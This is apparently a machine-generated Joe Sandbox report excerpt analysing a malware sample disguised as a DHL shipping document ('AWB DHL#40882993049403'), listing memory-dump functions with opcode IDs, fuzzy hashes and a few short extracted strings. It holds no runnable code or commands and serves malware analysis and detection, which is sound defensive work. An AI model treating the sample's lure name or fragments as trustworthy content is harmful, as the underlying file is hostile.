                                            • Instruction Fuzzy Hash: 7A11E9B1D056288BDB18CF5BC9456EEFAFBAFC8300F14C47A980DA6264DB7419458FA0
                                            Function 0145D1CF Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2086513930.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_145d000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                            • Instruction ID: eaa448be8b79a604f52ce021f70363935fed87665d4f867fe375517be49497b5
                                            • Opcode Fuzzy Hash: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                            • Instruction Fuzzy Hash: 4E11A975904280DFDB02CF54D5C4B16BBA1FB84224F24C6AAEC494B7A7C33AD44ACB61
                                            Function 05A26A02 Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 418bb5d00589c0868bff2e7ca4c1a2b4f98c18eb742d3b6f7cf61f9439dab150
                                            • Instruction ID: 2c43d2e2c9870e556045b9b7ce673595c8f18994cd1100ad8557043cc7e13b3a
                                            • Opcode Fuzzy Hash: 418bb5d00589c0868bff2e7ca4c1a2b4f98c18eb742d3b6f7cf61f9439dab150
                                            • Instruction Fuzzy Hash: 4D21D0B5D002499FCB10CF9AD985ADEFFF4FB49320F10841AE919A7210C375A955CFA1
                                            Function 05A29270 Relevance: .1, Instructions: 52COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9999c20d5c5cd2a2244436266bbc83aaaa35aa6e5fd1e9812b64c5783ba005dc
                                            • Instruction ID: b63edd9c6b3d95c57ff40a5e69c9cbabc47bcc16eda0b50b18737c05d46c8b51
                                            • Opcode Fuzzy Hash: 9999c20d5c5cd2a2244436266bbc83aaaa35aa6e5fd1e9812b64c5783ba005dc
                                            • Instruction Fuzzy Hash: 8B117971A48319DFDB50DFA9C846EABBFF4BF08600F0088A6E859D7612D7349584CF91
                                            Function 05A2A668 Relevance: .0, Instructions: 48COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9b57aebe01eeb2e9b5d930e2d491ccad9b6b85c2ba7afccf19f90f9b6c17cd02
                                            • Instruction ID: 8900ea212ae3397f8fbb6a0a12ce6847cdabeb427d7ddfabb2de3bf96d6734e2
                                            • Opcode Fuzzy Hash: 9b57aebe01eeb2e9b5d930e2d491ccad9b6b85c2ba7afccf19f90f9b6c17cd02
                                            • Instruction Fuzzy Hash: 16110574E08219EFCB08DF99C5819ADBBFAFB88310F11D5A5D418A7312D7B0AA41DF80
                                            Function 05A27478 Relevance: .0, Instructions: 47COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 631414a90880b20a6de9b888144cebe71c686236b5b7342085cb8440d5235454
                                            • Instruction ID: ca92254b4b938d1660884d919a229f8920623da011849348b720cf201ce13422
                                            • Opcode Fuzzy Hash: 631414a90880b20a6de9b888144cebe71c686236b5b7342085cb8440d5235454
                                            • Instruction Fuzzy Hash: A3018C30748254CFD705CB2CC846F217BA2FF86700F5984E6E2158F2B2CB21D801CB01
                                            Function 05A25ADC Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0d253293af5171e482c262959e8fa0c2b92be9180c252f340959062379d03834
                                            • Instruction ID: a6cf3b6fdb66aea48aacf522a6593f036a678dbda6c787033eca9539e9d73527
                                            • Opcode Fuzzy Hash: 0d253293af5171e482c262959e8fa0c2b92be9180c252f340959062379d03834
                                            • Instruction Fuzzy Hash: E5F06231B141196FCF08DB6CD85ADAE7FFAEB49314B10847AE405DB210DE31D8108755
                                            Function 05A2A347 Relevance: .0, Instructions: 44COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 62217bdd4dbdd41a640113b09c5f5072a2afca8dfbd4ba7bea03cb9405b37316
                                            • Instruction ID: 3c0318c6493fff5954f3aa7553feb0091febf5ccf0805c49fbf6ce4d48b90ab5
                                            • Opcode Fuzzy Hash: 62217bdd4dbdd41a640113b09c5f5072a2afca8dfbd4ba7bea03cb9405b37316
                                            • Instruction Fuzzy Hash: EA01F238A0A21CEBCB05EFB8D60BAAC7F35AB02610F1085EAD84817641CA704E85C792
                                            Function 05A2917B Relevance: .0, Instructions: 41COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 67a381190709bf5b4ec5170eb6f7dc8dbbb73fa3fcb29c9853e8361143eb24ac
                                            • Instruction ID: ca92224736e31efdc426384bd3f38c6fe29bb3b0f6e032ea56ab620301f1cc3c
                                            • Opcode Fuzzy Hash: 67a381190709bf5b4ec5170eb6f7dc8dbbb73fa3fcb29c9853e8361143eb24ac
                                            • Instruction Fuzzy Hash: F6012670D04255AFC790EFBF880ABAABFF1AF05610F0484E6D008CB152D3308485CB41
                                            Function 05A2B9A0 Relevance: .0, Instructions: 41COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1398a3b33c59a9bbf6f579e74f9a2bc9ff56fa3b6466962942e8b3d82494f613
                                            • Instruction ID: a4276ae1b0f8437cf9ad68476d2e0f7e14fda205df08fa81958e78bfc96290b7
                                            • Opcode Fuzzy Hash: 1398a3b33c59a9bbf6f579e74f9a2bc9ff56fa3b6466962942e8b3d82494f613
                                            • Instruction Fuzzy Hash: 9001E874A0911CEFCB04EFA9C685EADBBFAAB49300F15D495E5099B361DB30DE00DB50
                                            Function 05A2A3C7 Relevance: .0, Instructions: 40COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6d3e2585d794ea2cce71e20b37ff3ca2635d537f7c046e4be72a636ddbfd833c
                                            • Instruction ID: fa1a1572f938a75bfecdc255d126a82d4ec0449c979a60ef4e014c6b87a2b7bd
                                            • Opcode Fuzzy Hash: 6d3e2585d794ea2cce71e20b37ff3ca2635d537f7c046e4be72a636ddbfd833c
                                            • Instruction Fuzzy Hash: 34F0F634A0A22CDFCB04EFA8D54BABC7F75EB06320F1045D5D4490B651CE701E52D7A2
                                            Function 05A2B928 Relevance: .0, Instructions: 39COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 80be70c1d3df9ec3c6869348cd8d8c5d671780adfac0252de6a29a42a61f0a6b
                                            • Instruction ID: 772a4202b0b181214b0365023143c694a42810d7d7a5dceea3d564ac6c9b0a04
                                            • Opcode Fuzzy Hash: 80be70c1d3df9ec3c6869348cd8d8c5d671780adfac0252de6a29a42a61f0a6b
                                            • Instruction Fuzzy Hash: 77F08C7094D12DDBC704CB5DC542EBCBBFEAB4A300B10A5A5E4495B212D7309A40DBA0
                                            Function 05A291D3 Relevance: .0, Instructions: 36COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 857623e8a3e4101395f78a9f57ac2a17ba6f4c450cda509d221abdb0cfc48514
                                            • Instruction ID: e6ca5d0feb81f4453a595ef5f3fe555e7709d24696f3523fb00a3865f5dd3ca3
                                            • Opcode Fuzzy Hash: 857623e8a3e4101395f78a9f57ac2a17ba6f4c450cda509d221abdb0cfc48514
                                            • Instruction Fuzzy Hash: 6601A270948386AFDB15CFAAC45AEAFBFF1AF09610F0444CAD461DB282C7748482CB50
                                            Function 05A26990 Relevance: .0, Instructions: 34COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9f82f05ee76f378bde7e6cdd5d463c46cb1c3fc3ef8470a9eb4d115184a7fec9
                                            • Instruction ID: 901f2fad0cbf667232ea41cf443c02a2668e724c7657f74a028db993270f6b79
                                            • Opcode Fuzzy Hash: 9f82f05ee76f378bde7e6cdd5d463c46cb1c3fc3ef8470a9eb4d115184a7fec9
                                            • Instruction Fuzzy Hash: B9F09031604105AFDF09CF6CD886C9ABFFAEF49224B1580BBE408CF226DA319910C750
                                            Function 05A291E0 Relevance: .0, Instructions: 29COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8f9aa74d223e2df50c42255c50ece8ced5c26d01a1aa59442b1833446cbd49cb
                                            • Instruction ID: a88bb3a4b1e4629601381dd805554f84667ba33a5861bcc25493b010faac766c
                                            • Opcode Fuzzy Hash: 8f9aa74d223e2df50c42255c50ece8ced5c26d01a1aa59442b1833446cbd49cb
                                            • Instruction Fuzzy Hash: 93F0DAB0D0431A9FDB54DFADD846AAFBFF8BB48600F1045AAD918E7240D77095408F91
                                            Function 05A29421 Relevance: .0, Instructions: 28COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ed57a10f411a76232877bebed5b8c16c6d3ede1fa06718835e35a9e5af10ee38
                                            • Instruction ID: e980008d227c3f0e29c0e934deaa5bc8df226d271b4702f262f657322e8403a8
                                            • Opcode Fuzzy Hash: ed57a10f411a76232877bebed5b8c16c6d3ede1fa06718835e35a9e5af10ee38
                                            • Instruction Fuzzy Hash: 96F0A77490E6288FCB40DF1CD9C6AEA7777B745704F10A5A9D40D62056DB700AC9CB06
                                            Function 05A2CF10 Relevance: .0, Instructions: 27COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f42ead55a5a9bf95d58bb4b2686b18b2f0e49a986138b990c55d1e34be555112
                                            • Instruction ID: b322c34919ef66e0700ecff7f7935b496c563dd7dc0e5f1e62cdcd076ad973ac
                                            • Opcode Fuzzy Hash: f42ead55a5a9bf95d58bb4b2686b18b2f0e49a986138b990c55d1e34be555112
                                            • Instruction Fuzzy Hash: B8F0E530909258DFCB40EBAEC509FA97BBAAB48300F109436950657251DF301986CB62
                                            Function 05A2E3B8 Relevance: .0, Instructions: 23COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 158c87f3a3c38ae6f2148c2f911512dfe035427aa04dba63595ed67f248c8fca
                                            • Instruction ID: 2e134912cd972116e7281cb9e77d6a6e867aca6a524696a66d0d2d985932c8c5
                                            • Opcode Fuzzy Hash: 158c87f3a3c38ae6f2148c2f911512dfe035427aa04dba63595ed67f248c8fca
                                            • Instruction Fuzzy Hash: AFF03938D0420CEFCB40EFA9D54469DBBB5EB98311F10C0AAE81497350D6345A50DF91
                                            Function 05A29188 Relevance: .0, Instructions: 18COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 07173e97a124bb85bbcb95a5eaef20336a247cfddae9ceefac52ac357dce3864
                                            • Instruction ID: 882dfe3177deb598e5dd3cebd19537117e6a9af20728327cee8db4d296420f72
                                            • Opcode Fuzzy Hash: 07173e97a124bb85bbcb95a5eaef20336a247cfddae9ceefac52ac357dce3864
                                            • Instruction Fuzzy Hash: B9E092B0D40219AFD780EFAAC909A5EBBF2BB08A00F1189A9D419E7251E77496458F91
                                            Function 05A2AC15 Relevance: .0, Instructions: 18COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c07c0be3a5d114f1f6622009f502ded3ae81a864dd850dfd6a65e3ce0d97fdd6
                                            • Instruction ID: b4251309f94a638523bc3bb461e7430f768739d2a529601e45bb78c5b365721f
                                            • Opcode Fuzzy Hash: c07c0be3a5d114f1f6622009f502ded3ae81a864dd850dfd6a65e3ce0d97fdd6
                                            • Instruction Fuzzy Hash: 73E01A30509228CFC7509F24D18AA687B7AFF0A312F0068E4E40E6E262CB328C44CF60
                                            Function 05A290FB Relevance: .0, Instructions: 16COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b34948e747244f3c1312616f073171318382e34710bd72d8fb815e007d1fa730
                                            • Instruction ID: c2350ea46472fb6afc0c7f26175de58b0ac22d90d9c0c2a9557d75e6a552401c
                                            • Opcode Fuzzy Hash: b34948e747244f3c1312616f073171318382e34710bd72d8fb815e007d1fa730
                                            • Instruction Fuzzy Hash: C9D0A76105D5CC1FCB1117B4BDAE4387F349D4B1117081FD7E495CB093C1104891C3D1
                                            Function 05A2A3D8 Relevance: .0, Instructions: 16COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ba98f43541688c1b899b014570bf93e9775dcdb3a8e11293ea6ea6d81edf27d1
                                            • Instruction ID: 11c24079dc1ba771aa52aa3b0016d6eae70635ce3cbcf16af1dec6267172e638
                                            • Opcode Fuzzy Hash: ba98f43541688c1b899b014570bf93e9775dcdb3a8e11293ea6ea6d81edf27d1
                                            • Instruction Fuzzy Hash: E5D01770C1621CEBCB04EFA8E54A6ADBF74FB45312F2081A9E80427240CB715E94DBE6
                                            Function 05A29108 Relevance: .0, Instructions: 10COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e74a50c5d3c32d17d481577480c882d7aa0ff3d56e7a4ad68da526f6e3e1ba0d
                                            • Instruction ID: 54469dcc199b147ae5679d6488b5bb1cf2f830e0ef3da982fe98b7315615a150
                                            • Opcode Fuzzy Hash: e74a50c5d3c32d17d481577480c882d7aa0ff3d56e7a4ad68da526f6e3e1ba0d
                                            • Instruction Fuzzy Hash: 53C08C300026089BC70437A9F50FB243AB8A700326F046420F109010108FB010A0C6B6
                                            Function 05A26968 Relevance: .0, Instructions: 9COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 34a07c8f43f5b0cb8c72355c9a9d66e0a898877930ac6b6fa966b4ea55f20606
                                            • Instruction ID: cdc47bd797ffb08c6bdcea3b287792bcdb377d12c70383ae518492d70fd551d6
                                            • Opcode Fuzzy Hash: 34a07c8f43f5b0cb8c72355c9a9d66e0a898877930ac6b6fa966b4ea55f20606
                                            • Instruction Fuzzy Hash: E0C02B3128140A89F204E734C883F18B2EEF7F0700FB0C001C90888058CB10D402C126
                                            Function 05A25A94 Relevance: .0, Instructions: 8COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5892d0c70c92c3f8e513b72e8da0101c9d2b4141b2123257acabf580a97df699
                                            • Instruction ID: 9baef7664b61b30914da98d9a72933ad2f5c36a1a3dbf586a781cfd6d0811a7a
                                            • Opcode Fuzzy Hash: 5892d0c70c92c3f8e513b72e8da0101c9d2b4141b2123257acabf580a97df699
                                            • Instruction Fuzzy Hash: 9DB012B5696311AA4001B77C4ADBD7E94B1FBB6700BA08C11324585210CC208424DA27

                                            Non-executed Functions

                                            Function 05A22548 Relevance: 9.0, Strings: 7, Instructions: 280COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: !Y3E$Te]q$Te]q$$]q$$]q$$]q$$]q
                                            • API String ID: 0-1582036792
                                            • Opcode ID: a6012f0de3153efc8e9dbad76e52525ed2639042eae92dfe271e940b7734e4d9
                                            • Instruction ID: 80c15a5d26fb4597981a1fbf4edcc5cc762e9118b42f5c01a2f5f6ff1411c951
                                            • Opcode Fuzzy Hash: a6012f0de3153efc8e9dbad76e52525ed2639042eae92dfe271e940b7734e4d9
                                            • Instruction Fuzzy Hash: 2CA16F38B102198FD718DF69C899B6E7AF3BF88710F258429E906DB3A4DE70DC418B51
                                            Function 05A22538 Relevance: 5.3, Strings: 4, Instructions: 276COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te]q$Te]q$$]q$$]q
                                            • API String ID: 0-3083981010
                                            • Opcode ID: 98991bad8483e47f8e8c4b30ba31b7211e4be9f16255d9e6ad55a73b8e24b9f6
                                            • Instruction ID: 84d4466861e7e56148edd5b6292c3ce8f53f7d9f719081deb05af7e1fa12364b
                                            • Opcode Fuzzy Hash: 98991bad8483e47f8e8c4b30ba31b7211e4be9f16255d9e6ad55a73b8e24b9f6
                                            • Instruction Fuzzy Hash: 53A15E38B102198FD718DF69C999B6E7AB3BF88710F258469E906DB3A4DE70DC41CB50
                                            Function 05A226DB Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $]q$$]q
                                            • API String ID: 0-127220927
                                            • Opcode ID: 0fbbc3ec2afe80b0637122705ed5b8914f74bd723b3b4fd889ebfde306c3915e
                                            • Instruction ID: 1e255beed4a00de175f754dcc4f171ccbbb7b46694b1de3aa9d5beac4cefdfbe
                                            • Opcode Fuzzy Hash: 0fbbc3ec2afe80b0637122705ed5b8914f74bd723b3b4fd889ebfde306c3915e
                                            • Instruction Fuzzy Hash: AF519138B012199FDB149F79C896B6E7AB3BF88710F154429E902EB7A4CE75CC41CB50
                                            Function 05A26F78 Relevance: 1.4, Strings: 1, Instructions: 119COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: T(z
                                            • API String ID: 0-3184255237
                                            • Opcode ID: 60cafe556a1a93faf5429a793edccd244f9c21c0be8f86e9d197bf2ca1e56308
                                            • Instruction ID: 77c4c5fbc1098873138a7b02499136538ccbfe5a5865b33eb8957948ab80fc85
                                            • Opcode Fuzzy Hash: 60cafe556a1a93faf5429a793edccd244f9c21c0be8f86e9d197bf2ca1e56308
                                            • Instruction Fuzzy Hash: EA41D931F092258BDB58CFB989929BFF7B7FBC8750F14842AD501AB294CE308D058752
                                            Function 05A26F88 Relevance: 1.4, Strings: 1, Instructions: 116COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: T(z
                                            • API String ID: 0-3184255237
                                            • Opcode ID: d582e6bf112e9e4cbe90a43a1268b2f352ba64793de8f49769485b9066c2bad3
                                            • Instruction ID: 9ce5ae2b3c340a885a620d98028263d30298a5469f114d695a58e892eca8dc1d
                                            • Opcode Fuzzy Hash: d582e6bf112e9e4cbe90a43a1268b2f352ba64793de8f49769485b9066c2bad3
                                            • Instruction Fuzzy Hash: 2441D831F091258BDB58CEAD8592ABFF7B7EBCC750F10842AD501AB294DE318D058792
                                            Function 05A209E8 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ax^
                                            • API String ID: 0-994873808
                                            • Opcode ID: f2336426686cbda3944589d82125cf49a741d6bbe7a529d153da8b9ab44729ca
                                            • Instruction ID: e768564a5218167905b13c4900dc129e71c958fd5d3be7639baee6824287787f
                                            • Opcode Fuzzy Hash: f2336426686cbda3944589d82125cf49a741d6bbe7a529d153da8b9ab44729ca
                                            • Instruction Fuzzy Hash: 77419171F1526A8FCB40CFADD98A9AEFBF6FB98200B558126D90AF7350C234CD018B51
                                            Function 05A209F8 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ax^
                                            • API String ID: 0-994873808
                                            • Opcode ID: a3f4b4187a5865039b4e29ba55f237acf6ade832095372bf495cfff6f4a6094d
                                            • Instruction ID: 5dcf1a008079e902183a9384d33b1b78bc5b5a067abf4164b2eef29cb0f7f162
                                            • Opcode Fuzzy Hash: a3f4b4187a5865039b4e29ba55f237acf6ade832095372bf495cfff6f4a6094d
                                            • Instruction Fuzzy Hash: 5B419231F1526A8FCB44CF9DD88A8AEFBF6FB98200B558126D50AFB350C234DD018B91
                                            Function 053E0040 Relevance: .3, Instructions: 315COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089054014.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_53e0000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6cf7bea6e6d407876ac8bb8c7d9dd3e03a07d0c91e0e4fe7f6e08c6fb099b97f
                                            • Instruction ID: f68e6b20ba782ed2bc68432c10d7ba347948ced5b0d70e853f0eb5d2296068c9
